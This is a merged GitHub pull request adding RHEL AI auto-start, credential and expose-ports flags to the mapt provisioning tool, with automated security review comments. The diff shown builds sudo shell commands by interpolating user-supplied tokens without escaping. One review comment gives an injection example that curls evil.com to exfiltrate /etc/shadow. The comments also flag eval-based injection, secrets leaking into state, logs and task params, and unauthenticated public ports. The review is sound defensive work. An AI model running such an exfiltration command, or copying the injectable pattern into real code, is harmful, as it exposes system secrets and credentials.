
feat(aws): add RHAIIS auto-start and expose-ports flags for RHEL AI provisioning#835

Merged
adrianriobo merged 3 commits into
redhat-developer:mainfrom
are-ces:rhelai-rhaiis-auto-start
Jun 26, 2026

Conversation

@are-ces

@are-ces are-ces commented Jun 11, 2026

Contributor

Summary

Add --auto-start, --model, --hf-token, --api-key, and --expose-ports flags to mapt aws rhel-ai create to configure and start the RHAIIS inference server automatically after VM provisioning, and expose additional ports through the load balancer and security group.

Closes #759

Auto-start flags

After mapt aws rhel-ai create provisions a VM, the RHEL AI image ships with RHAIIS (vLLM inference server) pre-installed as a systemd quadlet but inactive. Users currently must SSH in manually to configure and start it. These flags automate that post-provisioning step.

When --auto-start is set, mapt SSHes into the provisioned VM after readiness, configures the RHAIIS quadlet with the provided model and credentials, and starts the systemd service. Sensitive output (HF token) is suppressed from logs using NoLoggingCmdStd. Without --auto-start, behavior is unchanged.

Expose ports

--expose-ports accepts a comma-separated list of ports (e.g. 8000,8080) to expose through the AWS load balancer target groups and security group ingress rules. By default only port 22 (SSH) is exposed. This enables external access to services like vLLM (port 8000) without requiring SSH tunneling.

Tekton task template

Updated tkn/template/infra-aws-rhel-ai.yaml with all new params: auto-start, model, hf-token, api-key, and expose-ports.

Usage:

mapt aws rhel-ai create \
    --project-name test \
    --backed-url "file:///tmp/test" \
    --version 3.4.0-ea.1 \
    --spot \
    --auto-start \
    --model meta-llama/Llama-3.2-1B-Instruct \
    --hf-token $HF_TOKEN \
    --api-key $API_KEY \
    --expose-ports 8000

Validated end-to-end: provisioned RHEL AI VM with --auto-start and --expose-ports 8000, confirmed systemctl status rhaiis active, curl <host>:8000/v1/models returns the model externally, and chat completions respond successfully.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

@coderabbitai

coderabbitai Bot commented Jun 11, 2026


📝 Walkthrough

Summary by CodeRabbit

  • New Features

    • Added support for additional RHEL AI provisioning options, including model selection, token/API key input, auto-start after setup, and custom exposed ports.
    • Provisioning tasks and CLI now accept these new settings at runtime.
  • Bug Fixes

    • Deployment behavior now adapts to auto-start settings, allowing instances to be left ready without immediately starting services.
  • Documentation

    • Updated user-facing parameter descriptions for the new RHEL AI configuration options.

Walkthrough

This PR adds RHEL-AI provisioning parameters for model, HF token, API key, auto-start, and exposed ports, then threads them through the task template, CLI, API contract, and AWS deployment flow.

Changes

RHEL-AI Configuration and Auto-Start

Layer / File(s) Summary
Public interfaces
pkg/target/host/rhelai/api.go, cmd/mapt/cmd/params/params.go, tkn/template/infra-aws-rhel-ai.yaml, tkn/infra-aws-rhel-ai.yaml
RHELAIArgs gains Model, HFToken, APIKey, AutoStart, and ExposePorts, and the task templates publish matching parameters and descriptions.
CLI and task wiring
cmd/mapt/cmd/aws/hosts/rhelai.go, tkn/template/infra-aws-rhel-ai.yaml, tkn/infra-aws-rhel-ai.yaml
The RHEL AI create command registers the new flags, maps the new values from viper into the create request, and the Tekton task builders append the matching mapt aws rhel-ai arguments.
Provider request and networking inputs
pkg/provider/aws/action/rhel-ai/rhelai.go
The provider request stores the new inputs, copies them from args, and expands security groups and target groups to include configured exposed ports alongside SSH.
Auto-start deployment flow
pkg/provider/aws/action/rhel-ai/rhelai.go
deploy(...) branches on autoStart and, when enabled, runs readiness and then executes the setup script that configures and starts rhaiis.

Estimated code review effort

🎯 3 (Moderate) | ⏱️ ~25 minutes

🚥 Pre-merge checks | ✅ 3 | ❌ 2

❌ Failed checks (2 warnings)

Check name Status Explanation Resolution
Out of Scope Changes check ⚠️ Warning The expose-ports functionality extends beyond linked issue #759 and adds unrelated provisioning scope. Move expose-ports to a separate PR or add a linked issue that explicitly requires exposing extra ports.
Docstring Coverage ⚠️ Warning Docstring coverage is 33.33% which is insufficient. The required threshold is 80.00%. Write docstrings for the functions missing them to satisfy the coverage threshold.
✅ Passed checks (3 passed)
Check name Status Explanation
Title check ✅ Passed The title clearly reflects the main RHEL AI provisioning change and mentions the added runtime flags.
Description check ✅ Passed The description directly matches the code changes and the linked RHEL-AI provisioning feature.
Linked Issues check ✅ Passed The PR implements the requested auto-start, model, hf-token, and api-key flags for RHEL-AI provisioning.


@are-ces are-ces marked this pull request as draft June 11, 2026 09:37

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@cmd/mapt/cmd/aws/hosts/rhelai.go`:
- Around line 66-69: The AutoStart field is being set with
viper.IsSet(params.RhelAIAutoStart), which only detects presence of the flag and
treats "--auto-start=false" as true; change the assignment to read the actual
boolean value using viper.GetBool(params.RhelAIAutoStart) so AutoStart reflects
explicit false values (update the struct initialization where AutoStart is set
and any related references to params.RhelAIAutoStart).

In `@pkg/provider/aws/action/rhel-ai/rhelai.go`:
- Around line 292-314: The rhaiisSetupScript function currently interpolates
user-controlled hfToken, model, and apiKey directly into shell commands,
creating a shell injection risk; update this by properly shell-escaping or
avoiding inline shell interpolation: sanitize/escape *r.hfToken, *r.model, and
*r.apiKey (e.g., use a shell-escaping helper such as
github.com/alessio/shellescape or go-shellquote) before inserting into the
sed/echo commands, or better yet write the values to a temporary file and use a
safe file-based systemd drop-in update instead of building complex command
strings; ensure the final command built by rhaiisSetupScript (and any usage with
NoLoggingCmdStd) only includes escaped literals or file references and not raw
user input.

📥 Commits

Reviewing files that changed from the base of the PR and between a2f7a23 and 6cf7f4f.

📒 Files selected for processing (4)
  • cmd/mapt/cmd/aws/hosts/rhelai.go
  • cmd/mapt/cmd/params/params.go
  • pkg/provider/aws/action/rhel-ai/rhelai.go
  • pkg/target/host/rhelai/api.go

Comment thread cmd/mapt/cmd/aws/hosts/rhelai.go
Comment on lines +292 to +314
func (r *rhelAIRequest) rhaiisSetupScript() string {
	confDir := "/etc/containers/systemd/rhaiis.container.d"
	script := fmt.Sprintf(
		"sudo cp %s/install.conf.example %s/install.conf",
		confDir, confDir)
	if len(*r.hfToken) > 0 {
		script += fmt.Sprintf(
			" && sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|' %s/install.conf",
			*r.hfToken, confDir)
	}
	if len(*r.model) > 0 {
		script += fmt.Sprintf(
			` && sudo sed -i 's|--model .*|--model %s \\|' %s/install.conf`,
			*r.model, confDir)
	}
	if len(*r.apiKey) > 0 {
		script += fmt.Sprintf(
			" && sudo sed -i '/\\[Install\\]/i Environment=VLLM_API_KEY=%s' %s/install.conf",
			*r.apiKey, confDir)
	}
	script += " && sudo systemctl daemon-reload && sudo systemctl start rhaiis"
	return script
}


⚠️ Potential issue | 🔴 Critical | 🏗️ Heavy lift

Shell injection vulnerability: sanitize user-controlled inputs before shell interpolation.

User-controlled values (hfToken, model, apiKey) are directly interpolated into shell commands without escaping. This creates a critical shell injection vulnerability. An attacker who controls these CLI parameters could inject arbitrary shell commands that execute with sudo privileges.

Example attack:

--hf-token='secret && curl evil.com/exfil?data=$(cat /etc/shadow)'

This would produce:

sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=secret && curl evil.com/exfil?data=$(cat /etc/shadow)|' ...

While NoLoggingCmdStd (line 250) prevents credential exposure in logs, it does not prevent shell injection.

🛡️ Recommended fix using shell escaping

Use shell quoting/escaping for all user-controlled interpolations. For bash, use printf %q or replace special characters:

 func (r *rhelAIRequest) rhaiisSetupScript() string {
 	confDir := "/etc/containers/systemd/rhaiis.container.d"
 	script := fmt.Sprintf(
 		"sudo cp %s/install.conf.example %s/install.conf",
 		confDir, confDir)
 	if len(*r.hfToken) > 0 {
+		escapedToken := shellescape.Quote(*r.hfToken)
 		script += fmt.Sprintf(
-			" && sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|' %s/install.conf",
-			*r.hfToken, confDir)
+			" && sudo sed -i \"s|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|\" %s/install.conf",
+			escapedToken, confDir)
 	}
 	if len(*r.model) > 0 {
+		escapedModel := shellescape.Quote(*r.model)
 		script += fmt.Sprintf(
-			` && sudo sed -i 's|--model .*|--model %s \\|' %s/install.conf`,
-			*r.model, confDir)
+			" && sudo sed -i \"s|--model .*|--model %s \\\\|\" %s/install.conf",
+			escapedModel, confDir)
 	}
 	if len(*r.apiKey) > 0 {
+		escapedKey := shellescape.Quote(*r.apiKey)
 		script += fmt.Sprintf(
-			" && sudo sed -i '/\\[Install\\]/i Environment=VLLM_API_KEY=%s' %s/install.conf",
-			*r.apiKey, confDir)
+			" && sudo sed -i \"/\\\\[Install\\\\]/i Environment=VLLM_API_KEY=%s\" %s/install.conf",
+			escapedKey, confDir)
 	}
 	script += " && sudo systemctl daemon-reload && sudo systemctl start rhaiis"
 	return script
 }
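Review bot: the proposed fix moves each sed script into double quotes, which undoes what `shellescape.Quote` provides: the single quotes it adds become literal characters in the replacement (the config line would read `HUGGING_FACE_HUB_TOKEN='...'`), while `$(...)`, backticks and `\` are still expanded by the shell inside double quotes, so the `$(cat /etc/shadow)` payload from the comment above would still run. The `--model` hunk also loses its closing delimiter: inside double quotes the shell collapses `\\|` to `\|`, which sed reads as an escaped literal `|`, leaving the `s` command unterminated. Keep the sed scripts single-quoted and splice the escaped value in by closing and reopening the quotes (`'s|--model .*|--model '%s' \\|'`, no spaces around `%s`), and, independently of shell quoting, reject `|`, `&`, `\` and newline in the values, since they carry meaning in a sed replacement even when the shell passes them through verbatim.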

Consider using a shell-escaping library like github.com/alessio/shellescape or github.com/kballard/go-shellquote.


@are-ces are-ces marked this pull request as ready for review June 25, 2026 09:59
are-ces and others added 2 commits June 26, 2026 08:28
Add --auto-start, --model, --hf-token, and --api-key flags to
`mapt aws rhel-ai create` to configure and start the RHAIIS
inference server automatically after VM provisioning.

When --auto-start is set, mapt SSHes into the provisioned VM after
readiness, configures the RHAIIS quadlet with the provided model
and credentials, and starts the systemd service.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Add --expose-ports flag to RHEL AI create command to expose additional
ports through the load balancer and security group. Update the Tekton
task template with new params: auto-start, model, hf-token, api-key,
and expose-ports.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@are-ces are-ces force-pushed the rhelai-rhaiis-auto-start branch from 6cf7f4f to 8bb6a46 Compare June 26, 2026 07:40

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 3

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@pkg/provider/aws/action/rhel-ai/rhelai.go`:
- Around line 227-228: CreateLoadBalancer in rhelai.go is still driven only by
SpotPrice, so non-spot expose-ports requests miss the load balancer path. Update
the logic where the deployment config is built (around CreateLoadBalancer,
ServiceEndpoints, and LBTargetGroups) so the load balancer is enabled whenever
exposePorts is requested, not just for spot allocation, and keep the
LBTargetGroups/service endpoint wiring consistent in both affected spots.
- Around line 329-335: The ingress rule creation in rhelai.go currently opens
every port in r.exposePorts to infra.NETWORKING_CIDR_ANY_IPV4, which can expose
unauthenticated inference endpoints. Update the logic in the loop around
r.exposePorts and securityGroup.IngressRules to require an API key before
allowing public exposure, or restrict access with a configurable source-CIDR
allowlist instead of 0.0.0.0/0. Ensure the RHEL AI provisioning path (including
autoStart and empty apiKey cases) blocks or narrows public access for these
ports.
- Around line 303-305: The `RunCommand` call in `rhelai.go` is still passing a
setup script string from `r.rhaiisSetupScript()` that interpolates `hfToken` or
`apiKey`, which can leave secrets in Pulumi state. Update the `RunCommand`/setup
flow so credentials are provided as Pulumi secret inputs (for example, mark the
credential-bearing arguments as secret) or injected through environment
variables instead of string interpolation. Make the change in the
`r.rhaiisSetupScript` path and the `RunCommand` invocation that uses it so no
secret values appear in the stored command text.

📥 Commits

Reviewing files that changed from the base of the PR and between 6cf7f4f and 8bb6a46.

📒 Files selected for processing (5)
  • cmd/mapt/cmd/aws/hosts/rhelai.go
  • cmd/mapt/cmd/params/params.go
  • pkg/provider/aws/action/rhel-ai/rhelai.go
  • pkg/target/host/rhelai/api.go
  • tkn/template/infra-aws-rhel-ai.yaml
🚧 Files skipped from review as they are similar to previous changes (3)
  • cmd/mapt/cmd/params/params.go
  • pkg/target/host/rhelai/api.go
  • cmd/mapt/cmd/aws/hosts/rhelai.go

Caution

Inline review comments failed to post. This is likely due to GitHub's internal server error or limits when posting large numbers of comments. If you are seeing this consistently it is likely a permissions issue. Please check "Moderation" -> "Code review limits" under your organization settings.

🛑 Comments failed to post (3)
pkg/provider/aws/action/rhel-ai/rhelai.go (3)

227-228: 🎯 Functional Correctness | 🟠 Major | ⚡ Quick win

Create the load balancer when ports are exposed.

LBTargetGroups now includes exposePorts, but CreateLoadBalancer is still only tied to spot allocation. Non-spot --expose-ports requests won’t get the advertised load-balancer path.

Proposed fix
-			CreateLoadBalancer: r.allocationData.SpotPrice != nil,
+			CreateLoadBalancer: r.allocationData.SpotPrice != nil || len(r.exposePorts) > 0,
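Review bot: the predicate now depends on a user-supplied list, so it has to be the same at the second site the comment points at (the `ServiceEndpoints`/`LBTargetGroups` wiring at 263-265); compute it once (`useLB := r.allocationData.SpotPrice != nil || len(r.exposePorts) > 0`) and reuse it in both places so the two cannot drift apart. It also changes behaviour for non-spot callers who pass `--expose-ports`: they now get a load balancer they did not get before, which is the point here, but the flag description should say so, since it is an extra billable AWS resource and a different host address than the instance's own.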

Also applies to: 263-265


303-305: 🔒 Security & Privacy | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify whether secret-bearing remote commands are stored as plain Pulumi command args.
sed -n '300,340p' pkg/provider/aws/modules/ec2/compute/compute.go
sed -n '361,383p' pkg/provider/aws/action/rhel-ai/rhelai.go


Avoid embedding credentials in Pulumi command strings

NoLoggingCmdStd suppresses the execution output, but it does not encrypt the command arguments stored in the Pulumi state. Because r.rhaiisSetupScript() embeds hfToken or apiKey directly into the string passed to RunCommand, these secrets risk being persisted in plain text within the state file.

Refactor to:

  • Use Pulumi Secret inputs and explicitly mark credential arguments as Secret(true), or
  • Inject credentials via environment variables/ECS/ESC rather than string interpolation.

This applies to pkg/provider/aws/action/rhel-ai/rhelai.go lines 303–305 and 366–379.


329-335: 🔒 Security & Privacy | 🟠 Major | ⚡ Quick win

Do not expose inference ports publicly without an auth requirement.

Every exposePorts entry opens 0.0.0.0/0; with autoStart enabled and an empty apiKey, this can publish vLLM unauthenticated. Require an API key for exposed RHAIIS ports or add a source-CIDR allowlist.


@are-ces are-ces changed the title feat(aws): add RHAIIS auto-start flags for RHEL AI provisioning feat(aws): add RHAIIS auto-start and expose-ports flags for RHEL AI provisioning Jun 26, 2026

Run make tkn-update to regenerate tkn/*.yaml from templates.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 3

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@tkn/infra-aws-rhel-ai.yaml`:
- Around line 149-154: Remove the hf-token and api-key Task parameters from the
Tekton task definition and update the related task steps to read both values
from a Secret mount or env source instead, matching the existing AWS and RH
credential pattern. Check the task spec where these params are declared and
wherever the task uses them, then replace param references with secret-backed
env/volume references so credentials are never stored in TaskRun/PipelineRun
specs.
- Around line 311-316: The shell snippet that builds cmd is leaking credentials
because xtrace is enabled earlier, so the direct expansion of $(params.hf-token)
and $(params.api-key) will be printed to logs. Update the secret handling in
this task script so the values are assigned or consumed in a way that avoids
traced expansion, and keep the relevant logic around cmd construction while
masking or temporarily disabling tracing in the section that references these
parameters.
- Around line 308-318: The command construction in the parameter handling block
is unsafe because `model`, `hf-token`, `api-key`, and `expose-ports` are
appended into a shell string that is later passed through `eval`. Update the
logic around the `cmd` assembly so these inputs are not concatenated into quoted
shell fragments; instead, build an argument list/array and execute it directly
from the same task script. Keep the fix localized to the branch that appends
these params and the later `eval "${cmd}"` execution path.

📥 Commits

Reviewing files that changed from the base of the PR and between 8bb6a46 and 956aaf1.

📒 Files selected for processing (1)
  • tkn/infra-aws-rhel-ai.yaml

Comment on lines +149 to +154
    - name: hf-token
      description: HuggingFace Hub token for model download. Read from secret if not set directly.
      default: ""
    - name: api-key
      description: API key to enforce secure connections to vLLM.
      default: ""


🔒 Security & Privacy | 🟠 Major | 🏗️ Heavy lift

Do not carry hf-token and api-key as Task params.

Tekton persists param values in the TaskRun/PipelineRun spec, so these credentials stay readable via the Kubernetes API even if later command output is suppressed. These should be sourced from a Secret mount/env, like the existing AWS and RH credentials.


Comment on lines +308 to +318
          if [[ "$(params.model)" != "" ]]; then
            cmd+="--model '$(params.model)' "
          fi
          if [[ "$(params.hf-token)" != "" ]]; then
            cmd+="--hf-token '$(params.hf-token)' "
          fi
          if [[ "$(params.api-key)" != "" ]]; then
            cmd+="--api-key '$(params.api-key)' "
          fi
          if [[ "$(params.expose-ports)" != "" ]]; then
            cmd+="--expose-ports '$(params.expose-ports)' "


🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win

Avoid sending these params through eval.

These values are concatenated into cmd and later executed with eval "${cmd}". A single quote in model, hf-token, api-key, or expose-ports breaks the quoting and becomes shell injection inside a container that already has AWS credentials mounted. Build an argv list instead of a shell string.

Suggested direction
-        cmd="mapt aws rhel-ai $(params.operation) "
+        set -- mapt aws rhel-ai "$(params.operation)"
...
-          if [[ "$(params.model)" != "" ]]; then
-            cmd+="--model '$(params.model)' "
-          fi
+          if [[ "$(params.model)" != "" ]]; then
+            set -- "$@" --model "$(params.model)"
+          fi
...
-        eval "${cmd}"
+        "$@"
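Review bot: the argv list removes the second parse that `eval "${cmd}"` performs, so a quote in `model` or `hf-token` can no longer split the command, but it does not address the trace leak: with `set -x` on (the task's `debug=true` path) the final `"$@"` line is printed with every argument expanded, token and API key included. Wrap that one invocation as `{ set +x; } 2>/dev/null; "$@"` or, better, take the credentials from a mounted Secret so they never appear in params at all. Note also that `set --` replaces the step script's own positional parameters, so any later use of `$1` or `$@` in that script must be checked.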
📝 Committable suggestion (the task's current lines, then the replacement)

Current:

          if [[ "$(params.model)" != "" ]]; then
            cmd+="--model '$(params.model)' "
          fi
          if [[ "$(params.hf-token)" != "" ]]; then
            cmd+="--hf-token '$(params.hf-token)' "
          fi
          if [[ "$(params.api-key)" != "" ]]; then
            cmd+="--api-key '$(params.api-key)' "
          fi
          if [[ "$(params.expose-ports)" != "" ]]; then
            cmd+="--expose-ports '$(params.expose-ports)' "

Suggested:

          if [[ "$(params.model)" != "" ]]; then
            set -- "$@" --model "$(params.model)"
          fi
          if [[ "$(params.hf-token)" != "" ]]; then
            set -- "$@" --hf-token "$(params.hf-token)"
          fi
          if [[ "$(params.api-key)" != "" ]]; then
            set -- "$@" --api-key "$(params.api-key)"
          fi
          if [[ "$(params.expose-ports)" != "" ]]; then
            set -- "$@" --expose-ports "$(params.expose-ports)"

Comment on lines +311 to +316
          if [[ "$(params.hf-token)" != "" ]]; then
            cmd+="--hf-token '$(params.hf-token)' "
          fi
          if [[ "$(params.api-key)" != "" ]]; then
            cmd+="--api-key '$(params.api-key)' "
          fi


🔒 Security & Privacy | 🟠 Major | ⚡ Quick win

debug=true will print the new secrets to logs.

Line 253 enables xtrace, and these assignments expand $(params.hf-token) and $(params.api-key) directly in traced shell output. That leaks both credentials verbatim during task execution.


@adrianriobo adrianriobo merged commit a43bcd4 into redhat-developer:main Jun 26, 2026
9 checks passed
@adrianriobo adrianriobo mentioned this pull request Jun 26, 2026
Development

Successfully merging this pull request may close these issues.

[feature] RHEL-AI --auto-start flag
